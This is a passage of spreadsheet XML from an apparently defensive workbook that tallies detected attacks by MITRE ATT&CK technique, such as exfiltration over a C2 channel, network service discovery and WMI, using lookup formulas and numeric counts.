        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F13" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G13" s="292">
        <v>1</v>
      </c>
      <c r="H13" s="322">
        <v>1</v>
      </c>
      <c r="I13" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J13" s="12">
        <v>1</v>
      </c>
      <c r="K13" s="13">
        <v>1</v>
      </c>
      <c r="L13" s="394">
        <v>1</v>
      </c>
      <c r="M13" s="322">
        <v>0</v>
      </c>
      <c r="N13" s="322">
        <v>0</v>
      </c>
      <c r="O13" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P13" s="12">
        <v>0</v>
      </c>
      <c r="Q13" s="13">
        <v>0</v>
      </c>
      <c r="R13" s="394">
        <v>0</v>
      </c>
      <c r="S13" s="292">
        <v>1</v>
      </c>
      <c r="T13" s="322">
        <v>1</v>
      </c>
      <c r="U13" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V13" s="12">
        <v>1</v>
      </c>
      <c r="W13" s="13">
        <v>1</v>
      </c>
      <c r="X13" s="394">
        <v>1</v>
      </c>
      <c r="Y13" s="392">
        <v>2</v>
      </c>
      <c r="Z13" s="392">
        <v>2</v>
      </c>
      <c r="AA13" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (2)</v>
      </c>
      <c r="AB13" s="392">
        <v>2</v>
      </c>
      <c r="AC13" s="16">
        <v>1</v>
      </c>
      <c r="AD13" s="394">
        <v>1</v>
      </c>
      <c r="AE13" s="392">
        <v>4</v>
      </c>
      <c r="AF13" s="392">
        <v>4</v>
      </c>
      <c r="AG13" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (4)</v>
      </c>
      <c r="AH13" s="392">
        <v>2</v>
      </c>
      <c r="AI13" s="16">
        <v>1</v>
      </c>
      <c r="AJ13" s="394">
        <v>2</v>
      </c>
      <c r="AK13" s="392">
        <v>6</v>
      </c>
      <c r="AL13" s="392">
        <v>6</v>
      </c>
      <c r="AM13" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (6)</v>
      </c>
      <c r="AN13" s="392">
        <v>4</v>
      </c>
      <c r="AO13" s="16">
        <v>1</v>
      </c>
      <c r="AP13" s="394">
        <v>3</v>
      </c>
      <c r="AQ13" s="292">
        <v>0</v>
      </c>
      <c r="AR13" s="322">
        <v>0</v>
      </c>
      <c r="AS13" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT13" s="12">
        <v>0</v>
      </c>
      <c r="AU13" s="13">
        <v>0</v>
      </c>
      <c r="AV13" s="394">
        <v>0</v>
      </c>
      <c r="AW13" s="392">
        <v>0</v>
      </c>
      <c r="AX13" s="392">
        <v>0</v>
      </c>
      <c r="AY13" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ13" s="4">
        <v>0</v>
      </c>
      <c r="BA13" s="16">
        <v>0</v>
      </c>
      <c r="BB13" s="394">
        <v>0</v>
      </c>
      <c r="BC13" s="292">
        <v>1</v>
      </c>
      <c r="BD13" s="322">
        <v>1</v>
      </c>
      <c r="BE13" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF13" s="12">
        <v>1</v>
      </c>
      <c r="BG13" s="13">
        <v>1</v>
      </c>
      <c r="BH13" s="394">
        <v>1</v>
      </c>
      <c r="BI13" s="292">
        <v>0</v>
      </c>
      <c r="BJ13" s="322">
        <v>0</v>
      </c>
      <c r="BK13" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL13" s="12">
        <v>0</v>
      </c>
      <c r="BM13" s="13">
        <v>0</v>
      </c>
      <c r="BN13" s="394">
        <v>0</v>
      </c>
      <c r="BO13" s="292">
        <v>3</v>
      </c>
      <c r="BP13" s="322">
        <v>3</v>
      </c>
      <c r="BQ13" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (3)</v>
      </c>
      <c r="BR13" s="12">
        <v>0</v>
      </c>
      <c r="BS13" s="12">
        <v>3</v>
      </c>
      <c r="BT13" s="13">
        <v>1</v>
      </c>
      <c r="BU13" s="394">
        <v>1</v>
      </c>
      <c r="BV13" s="292">
        <v>0</v>
      </c>
      <c r="BW13" s="322">
        <v>0</v>
      </c>
      <c r="BX13" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY13" s="12">
        <v>0</v>
      </c>
      <c r="BZ13" s="13">
        <v>0</v>
      </c>
      <c r="CA13" s="394">
        <v>0</v>
      </c>
      <c r="CB13" s="292">
        <v>1</v>
      </c>
      <c r="CC13" s="322">
        <v>1</v>
      </c>
      <c r="CD13" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE13" s="12">
        <v>0</v>
      </c>
      <c r="CF13" s="12">
        <v>1</v>
      </c>
      <c r="CG13" s="13">
        <v>1</v>
      </c>
      <c r="CH13" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:93" ht="15" customHeight="1">
      <c r="A14" s="4">
        <f t="shared" si="13"/>
        <v>12</v>
      </c>
      <c r="B14" s="4" t="str">
        <f>IFERROR(VLOOKUP(A14,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1041</v>
      </c>
      <c r="C14" s="493" t="str">
        <f>IFERROR(VLOOKUP(B14,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="D14" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B14)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E14" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F14" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G14" s="292">
        <v>0</v>
      </c>
      <c r="H14" s="322">
        <v>0</v>
      </c>
      <c r="I14" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J14" s="12">
        <v>0</v>
      </c>
      <c r="K14" s="13">
        <v>0</v>
      </c>
      <c r="L14" s="394">
        <v>0</v>
      </c>
      <c r="M14" s="322">
        <v>8</v>
      </c>
      <c r="N14" s="322">
        <v>4</v>
      </c>
      <c r="O14" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (8)</v>
      </c>
      <c r="P14" s="12">
        <v>4</v>
      </c>
      <c r="Q14" s="13">
        <v>1</v>
      </c>
      <c r="R14" s="394">
        <v>2</v>
      </c>
      <c r="S14" s="292">
        <v>8</v>
      </c>
      <c r="T14" s="322">
        <v>4</v>
      </c>
      <c r="U14" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (8)</v>
      </c>
      <c r="V14" s="12">
        <v>4</v>
      </c>
      <c r="W14" s="13">
        <v>1</v>
      </c>
      <c r="X14" s="394">
        <v>2</v>
      </c>
      <c r="Y14" s="392">
        <v>6</v>
      </c>
      <c r="Z14" s="392">
        <v>2</v>
      </c>
      <c r="AA14" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (6)</v>
      </c>
      <c r="AB14" s="392">
        <v>1</v>
      </c>
      <c r="AC14" s="16">
        <v>1</v>
      </c>
      <c r="AD14" s="394">
        <v>2</v>
      </c>
      <c r="AE14" s="392">
        <v>19</v>
      </c>
      <c r="AF14" s="392">
        <v>9</v>
      </c>
      <c r="AG14" s="322" t="str">
        <f t="shared" si="4"/>
        <v>9 (19)</v>
      </c>
      <c r="AH14" s="392">
        <v>8</v>
      </c>
      <c r="AI14" s="16">
        <v>1</v>
      </c>
      <c r="AJ14" s="394">
        <v>2</v>
      </c>
      <c r="AK14" s="392">
        <v>25</v>
      </c>
      <c r="AL14" s="392">
        <v>11</v>
      </c>
      <c r="AM14" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (25)</v>
      </c>
      <c r="AN14" s="392">
        <v>9</v>
      </c>
      <c r="AO14" s="16">
        <v>1</v>
      </c>
      <c r="AP14" s="394">
        <v>2</v>
      </c>
      <c r="AQ14" s="292">
        <v>0</v>
      </c>
      <c r="AR14" s="322">
        <v>0</v>
      </c>
      <c r="AS14" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT14" s="12">
        <v>0</v>
      </c>
      <c r="AU14" s="13">
        <v>0</v>
      </c>
      <c r="AV14" s="394">
        <v>0</v>
      </c>
      <c r="AW14" s="392">
        <v>0</v>
      </c>
      <c r="AX14" s="392">
        <v>0</v>
      </c>
      <c r="AY14" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ14" s="4">
        <v>0</v>
      </c>
      <c r="BA14" s="16">
        <v>0</v>
      </c>
      <c r="BB14" s="394">
        <v>0</v>
      </c>
      <c r="BC14" s="292">
        <v>8</v>
      </c>
      <c r="BD14" s="322">
        <v>4</v>
      </c>
      <c r="BE14" s="322" t="str">
        <f t="shared" si="8"/>
        <v>4 (8)</v>
      </c>
      <c r="BF14" s="12">
        <v>4</v>
      </c>
      <c r="BG14" s="13">
        <v>1</v>
      </c>
      <c r="BH14" s="394">
        <v>2</v>
      </c>
      <c r="BI14" s="292">
        <v>0</v>
      </c>
      <c r="BJ14" s="322">
        <v>0</v>
      </c>
      <c r="BK14" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL14" s="12">
        <v>0</v>
      </c>
      <c r="BM14" s="13">
        <v>0</v>
      </c>
      <c r="BN14" s="394">
        <v>0</v>
      </c>
      <c r="BO14" s="292">
        <v>2</v>
      </c>
      <c r="BP14" s="322">
        <v>2</v>
      </c>
      <c r="BQ14" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR14" s="12">
        <v>0</v>
      </c>
      <c r="BS14" s="12">
        <v>2</v>
      </c>
      <c r="BT14" s="13">
        <v>1</v>
      </c>
      <c r="BU14" s="394">
        <v>1</v>
      </c>
      <c r="BV14" s="292">
        <v>0</v>
      </c>
      <c r="BW14" s="322">
        <v>0</v>
      </c>
      <c r="BX14" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY14" s="12">
        <v>0</v>
      </c>
      <c r="BZ14" s="13">
        <v>0</v>
      </c>
      <c r="CA14" s="394">
        <v>0</v>
      </c>
      <c r="CB14" s="292">
        <v>0</v>
      </c>
      <c r="CC14" s="322">
        <v>0</v>
      </c>
      <c r="CD14" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE14" s="12">
        <v>0</v>
      </c>
      <c r="CF14" s="12">
        <v>0</v>
      </c>
      <c r="CG14" s="13">
        <v>0</v>
      </c>
      <c r="CH14" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A15" s="4">
        <f t="shared" si="13"/>
        <v>13</v>
      </c>
      <c r="B15" s="4" t="str">
        <f>IFERROR(VLOOKUP(A15,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1046</v>
      </c>
      <c r="C15" s="493" t="str">
        <f>IFERROR(VLOOKUP(B15,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Service Discovery</v>
      </c>
      <c r="D15" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B15)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E15" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>65846</v>
      </c>
      <c r="F15" s="579" t="str">
        <f t="shared" si="14"/>
        <v>3 (65846)</v>
      </c>
      <c r="G15" s="292">
        <v>260</v>
      </c>
      <c r="H15" s="322">
        <v>91</v>
      </c>
      <c r="I15" s="322" t="str">
        <f t="shared" si="0"/>
        <v>91 (260)</v>
      </c>
      <c r="J15" s="12">
        <v>9</v>
      </c>
      <c r="K15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="L15" s="394">
        <v>78</v>
      </c>
      <c r="M15" s="322">
        <v>856</v>
      </c>
      <c r="N15" s="322">
        <v>303</v>
      </c>
      <c r="O15" s="322" t="str">
        <f t="shared" si="1"/>
        <v>303 (856)</v>
      </c>
      <c r="P15" s="12">
        <v>122</v>
      </c>
      <c r="Q15" s="13">
        <v>1</v>
      </c>
      <c r="R15" s="394">
        <v>116</v>
      </c>
      <c r="S15" s="292">
        <v>1116</v>
      </c>
      <c r="T15" s="322">
        <v>394</v>
      </c>
      <c r="U15" s="322" t="str">
        <f t="shared" si="2"/>
        <v>394 (1116)</v>
      </c>
      <c r="V15" s="12">
        <v>131</v>
      </c>
      <c r="W15" s="13">
        <v>1</v>
      </c>
      <c r="X15" s="394">
        <v>132</v>
      </c>
      <c r="Y15" s="392">
        <v>9694</v>
      </c>
      <c r="Z15" s="392">
        <v>1142</v>
      </c>
      <c r="AA15" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1142 (9694)</v>
      </c>
      <c r="AB15" s="392">
        <v>440</v>
      </c>
      <c r="AC15" s="16">
        <v>1</v>
      </c>
      <c r="AD15" s="394">
        <v>169</v>
      </c>
      <c r="AE15" s="392">
        <v>4178</v>
      </c>
      <c r="AF15" s="392">
        <v>816</v>
      </c>
      <c r="AG15" s="322" t="str">
        <f t="shared" si="4"/>
        <v>816 (4178)</v>
      </c>
      <c r="AH15" s="392">
        <v>333</v>
      </c>
      <c r="AI15" s="16">
        <v>1</v>
      </c>
      <c r="AJ15" s="394">
        <v>142</v>
      </c>
      <c r="AK15" s="392">
        <v>13872</v>
      </c>
      <c r="AL15" s="392">
        <v>1958</v>
      </c>
      <c r="AM15" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1958 (13872)</v>
      </c>
      <c r="AN15" s="392">
        <v>773</v>
      </c>
      <c r="AO15" s="16">
        <v>1</v>
      </c>
      <c r="AP15" s="394">
        <v>177</v>
      </c>
      <c r="AQ15" s="292">
        <v>0</v>
      </c>
      <c r="AR15" s="322">
        <v>0</v>
      </c>
      <c r="AS15" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT15" s="12">
        <v>0</v>
      </c>
      <c r="AU15" s="13">
        <v>0</v>
      </c>
      <c r="AV15" s="394">
        <v>0</v>
      </c>
      <c r="AW15" s="392">
        <v>1803</v>
      </c>
      <c r="AX15" s="392">
        <v>621</v>
      </c>
      <c r="AY15" s="322" t="str">
        <f t="shared" si="7"/>
        <v>621 (1803)</v>
      </c>
      <c r="AZ15" s="4">
        <v>341</v>
      </c>
      <c r="BA15" s="16">
        <v>0.66666666666666663</v>
      </c>
      <c r="BB15" s="394">
        <v>127</v>
      </c>
      <c r="BC15" s="292">
        <v>2919</v>
      </c>
      <c r="BD15" s="322">
        <v>1015</v>
      </c>
      <c r="BE15" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1015 (2919)</v>
      </c>
      <c r="BF15" s="12">
        <v>472</v>
      </c>
      <c r="BG15" s="13">
        <v>1</v>
      </c>
      <c r="BH15" s="394">
        <v>149</v>
      </c>
      <c r="BI15" s="292">
        <v>330</v>
      </c>
      <c r="BJ15" s="322">
        <v>229</v>
      </c>
      <c r="BK15" s="322" t="str">
        <f t="shared" si="9"/>
        <v>229 (330)</v>
      </c>
      <c r="BL15" s="12">
        <v>80</v>
      </c>
      <c r="BM15" s="13">
        <v>1</v>
      </c>
      <c r="BN15" s="394">
        <v>119</v>
      </c>
      <c r="BO15" s="292">
        <v>508</v>
      </c>
      <c r="BP15" s="322">
        <v>407</v>
      </c>
      <c r="BQ15" s="322" t="str">
        <f t="shared" si="10"/>
        <v>407 (508)</v>
      </c>
      <c r="BR15" s="12">
        <v>80</v>
      </c>
      <c r="BS15" s="12">
        <v>9</v>
      </c>
      <c r="BT15" s="13">
        <v>1</v>
      </c>
      <c r="BU15" s="394">
        <v>180</v>
      </c>
      <c r="BV15" s="292">
        <v>95</v>
      </c>
      <c r="BW15" s="322">
        <v>75</v>
      </c>
      <c r="BX15" s="322" t="str">
        <f t="shared" si="11"/>
        <v>75 (95)</v>
      </c>
      <c r="BY15" s="12">
        <v>44</v>
      </c>
      <c r="BZ15" s="13">
        <v>1</v>
      </c>
      <c r="CA15" s="394">
        <v>48</v>
      </c>
      <c r="CB15" s="292">
        <v>5557</v>
      </c>
      <c r="CC15" s="322">
        <v>167</v>
      </c>
      <c r="CD15" s="322" t="str">
        <f t="shared" si="12"/>
        <v>167 (5557)</v>
      </c>
      <c r="CE15" s="12">
        <v>0</v>
      </c>
      <c r="CF15" s="12">
        <v>4</v>
      </c>
      <c r="CG15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CH15" s="394">
        <v>166</v>
      </c>
    </row>
    <row r="16" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A16" s="4">
        <f t="shared" si="13"/>
        <v>14</v>
      </c>
      <c r="B16" s="4" t="str">
        <f>IFERROR(VLOOKUP(A16,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1047</v>
      </c>
      <c r="C16" s="493" t="str">
        <f>IFERROR(VLOOKUP(B16,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="D16" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B16)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E16" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>912</v>
      </c>
      <c r="F16" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (912)</v>
      </c>
      <c r="G16" s="292">
        <v>5</v>
      </c>
      <c r="H16" s="322">
        <v>1</v>
      </c>
      <c r="I16" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (5)</v>
      </c>
      <c r="J16" s="12">
        <v>1</v>
      </c>
      <c r="K16" s="13">
        <v>1</v>
      </c>
      <c r="L16" s="394">
        <v>1</v>
      </c>
      <c r="M16" s="322">
        <v>1367</v>
      </c>
      <c r="N16" s="322">
        <v>1321</v>
      </c>
      <c r="O16" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1321 (1367)</v>
      </c>
      <c r="P16" s="12">
        <v>5</v>
      </c>
      <c r="Q16" s="13">
        <v>1</v>
      </c>
      <c r="R16" s="394">
        <v>878</v>
      </c>
      <c r="S16" s="292">
        <v>1372</v>
      </c>
      <c r="T16" s="322">
        <v>1322</v>
      </c>
      <c r="U16" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1322 (1372)</v>
      </c>
      <c r="V16" s="12">
        <v>6</v>
      </c>
      <c r="W16" s="13">
        <v>1</v>
      </c>
      <c r="X16" s="394">
        <v>878</v>
      </c>
      <c r="Y16" s="392">
        <v>951</v>
      </c>
      <c r="Z16" s="392">
        <v>900</v>
      </c>
      <c r="AA16" s="322" t="str">
        <f t="shared" si="3"/>
        <v>900 (951)</v>
      </c>
      <c r="AB16" s="392">
        <v>5</v>
      </c>
      <c r="AC16" s="16">
        <v>1</v>
      </c>
      <c r="AD16" s="394">
        <v>878</v>
      </c>
      <c r="AE16" s="392">
        <v>2285</v>
      </c>
      <c r="AF16" s="392">
        <v>2203</v>
      </c>
      <c r="AG16" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2203 (2285)</v>
      </c>
      <c r="AH16" s="392">
        <v>12</v>
      </c>
      <c r="AI16" s="16">
        <v>1</v>
      </c>
      <c r="AJ16" s="394">
        <v>878</v>
      </c>
      <c r="AK16" s="392">
        <v>3236</v>
      </c>
      <c r="AL16" s="392">
        <v>3103</v>
      </c>
      <c r="AM16" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3103 (3236)</v>
      </c>
      <c r="AN16" s="392">
        <v>17</v>
      </c>
      <c r="AO16" s="16">
        <v>1</v>
      </c>
      <c r="AP16" s="394">
        <v>878</v>
      </c>
      <c r="AQ16" s="292">
        <v>0</v>
      </c>
      <c r="AR16" s="322">
        <v>0</v>
      </c>
      <c r="AS16" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT16" s="12">
        <v>0</v>
      </c>
      <c r="AU16" s="13">
        <v>0</v>
      </c>
      <c r="AV16" s="394">
        <v>0</v>
      </c>
      <c r="AW16" s="392">
        <v>34</v>
      </c>
      <c r="AX16" s="392">
        <v>20</v>
      </c>
      <c r="AY16" s="322" t="str">
        <f t="shared" si="7"/>
        <v>20 (34)</v>
      </c>
      <c r="AZ16" s="4">
        <v>1</v>
      </c>
      <c r="BA16" s="16">
        <v>1</v>
      </c>
      <c r="BB16" s="394">
        <v>20</v>
      </c>
      <c r="BC16" s="292">
        <v>1406</v>
      </c>
      <c r="BD16" s="322">
        <v>1342</v>
      </c>
      <c r="BE16" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1342 (1406)</v>
      </c>
      <c r="BF16" s="12">
        <v>7</v>
      </c>
      <c r="BG16" s="13">
        <v>1</v>
      </c>
      <c r="BH16" s="394">
        <v>878</v>
      </c>
      <c r="BI16" s="292">
        <v>2</v>
      </c>
      <c r="BJ16" s="322">
        <v>2</v>
      </c>
      <c r="BK16" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (2)</v>
      </c>
      <c r="BL16" s="12">
        <v>1</v>
      </c>
      <c r="BM16" s="13">
        <v>1</v>
      </c>
      <c r="BN16" s="394">
        <v>2</v>
      </c>
      <c r="BO16" s="292">
        <v>1825</v>
      </c>
      <c r="BP16" s="322">
        <v>1822</v>
      </c>
      <c r="BQ16" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1822 (1825)</v>
      </c>
      <c r="BR16" s="12">
        <v>1</v>
      </c>
      <c r="BS16" s="12">
        <v>5</v>
      </c>
      <c r="BT16" s="13">
        <v>1</v>
      </c>
      <c r="BU16" s="394">
        <v>912</v>
      </c>
      <c r="BV16" s="292">
        <v>0</v>
      </c>
      <c r="BW16" s="322">
        <v>0</v>
      </c>
      <c r="BX16" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY16" s="12">
        <v>0</v>
      </c>
      <c r="BZ16" s="13">
        <v>0</v>
      </c>
      <c r="CA16" s="394">
        <v>0</v>
      </c>
      <c r="CB16" s="292">
        <v>0</v>
      </c>
      <c r="CC16" s="322">
        <v>0</v>
      </c>
      <c r="CD16" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE16" s="12">
        <v>0</v>
      </c>
      <c r="CF16" s="12">
        <v>0</v>
      </c>
      <c r="CG16" s="13">
        <v>0</v>
      </c>
      <c r="CH16" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A17" s="4">
        <f t="shared" si="13"/>
        <v>15</v>
      </c>
      <c r="B17" s="4" t="str">
        <f>IFERROR(VLOOKUP(A17,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1048</v>
      </c>
      <c r="C17" s="493" t="str">
        <f>IFERROR(VLOOKUP(B17,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="D17" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B17)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E17" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F17" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (12)</v>
      </c>
      <c r="G17" s="292">
        <v>2</v>
      </c>
      <c r="H17" s="322">
        <v>1</v>
      </c>
      <c r="I17" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J17" s="12">
        <v>1</v>
      </c>
      <c r="K17" s="13">
        <v>0.5</v>
      </c>
      <c r="L17" s="394">
        <v>1</v>
      </c>
      <c r="M17" s="322">
        <v>0</v>
      </c>
      <c r="N17" s="322">
        <v>0</v>
      </c>
      <c r="O17" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P17" s="12">
        <v>0</v>
      </c>
      <c r="Q17" s="13">
        <v>0</v>
      </c>
      <c r="R17" s="394">
        <v>0</v>
      </c>
      <c r="S17" s="292">
        <v>2</v>
      </c>
      <c r="T17" s="322">
        <v>1</v>
      </c>
      <c r="U17" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (2)</v>
      </c>
      <c r="V17" s="12">
        <v>1</v>
      </c>
      <c r="W17" s="13">
        <v>0.5</v>
      </c>
      <c r="X17" s="394">
        <v>1</v>
      </c>
      <c r="Y17" s="392">
        <v>34</v>
      </c>
      <c r="Z17" s="392">
        <v>3</v>
      </c>
      <c r="AA17" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (34)</v>
      </c>
      <c r="AB17" s="392">
        <v>3</v>
      </c>
      <c r="AC17" s="16">
        <v>1</v>
      </c>
      <c r="AD17" s="394">
        <v>2</v>
      </c>
      <c r="AE17" s="392">
        <v>16</v>
      </c>
      <c r="AF17" s="392">
        <v>7</v>
      </c>
      <c r="AG17" s="322" t="str">
        <f t="shared" si="4"/>
        <v>7 (16)</v>
      </c>
      <c r="AH17" s="392">
        <v>3</v>
      </c>
      <c r="AI17" s="16">
        <v>1</v>
      </c>
      <c r="AJ17" s="394">
        <v>3</v>
      </c>
      <c r="AK17" s="392">
        <v>50</v>
      </c>
      <c r="AL17" s="392">
        <v>10</v>
      </c>
      <c r="AM17" s="322" t="str">
        <f t="shared" si="5"/>
        <v>10 (50)</v>
      </c>
      <c r="AN17" s="392">
        <v>6</v>
      </c>
      <c r="AO17" s="16">
        <v>1</v>
      </c>
      <c r="AP17" s="394">
        <v>3</v>
      </c>
      <c r="AQ17" s="292">
        <v>0</v>
      </c>
      <c r="AR17" s="322">
        <v>0</v>
      </c>
      <c r="AS17" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT17" s="12">
        <v>0</v>
      </c>
      <c r="AU17" s="13">
        <v>0</v>
      </c>
      <c r="AV17" s="394">
        <v>0</v>
      </c>
      <c r="AW17" s="392">
        <v>16</v>
      </c>
      <c r="AX17" s="392">
        <v>1</v>
      </c>
      <c r="AY17" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (16)</v>
      </c>
      <c r="AZ17" s="4">
        <v>1</v>
      </c>
      <c r="BA17" s="16">
        <v>0.5</v>
      </c>
      <c r="BB17" s="394">
        <v>1</v>
      </c>
      <c r="BC17" s="292">
        <v>18</v>
      </c>
      <c r="BD17" s="322">
        <v>2</v>
      </c>
      <c r="BE17" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (18)</v>
      </c>
      <c r="BF17" s="12">
        <v>2</v>
      </c>
      <c r="BG17" s="13">
        <v>1</v>
      </c>
      <c r="BH17" s="394">
        <v>2</v>
      </c>
      <c r="BI17" s="292">
        <v>0</v>
      </c>
      <c r="BJ17" s="322">
        <v>0</v>
      </c>
      <c r="BK17" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL17" s="12">
        <v>0</v>
      </c>
      <c r="BM17" s="13">
        <v>0</v>
      </c>
      <c r="BN17" s="394">
        <v>0</v>
      </c>
      <c r="BO17" s="292">
        <v>9</v>
      </c>
      <c r="BP17" s="322">
        <v>3</v>
      </c>
      <c r="BQ17" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (9)</v>
      </c>
      <c r="BR17" s="12">
        <v>0</v>
      </c>
      <c r="BS17" s="12">
        <v>3</v>
      </c>
      <c r="BT17" s="13">
        <v>1</v>
      </c>
      <c r="BU17" s="394">
        <v>3</v>
      </c>
      <c r="BV17" s="292">
        <v>0</v>
      </c>
      <c r="BW17" s="322">
        <v>0</v>
      </c>
      <c r="BX17" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY17" s="12">
        <v>0</v>
      </c>
      <c r="BZ17" s="13">
        <v>0</v>
      </c>
      <c r="CA17" s="394">
        <v>0</v>
      </c>
      <c r="CB17" s="292">
        <v>0</v>
      </c>
      <c r="CC17" s="322">
        <v>0</v>
      </c>
      <c r="CD17" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
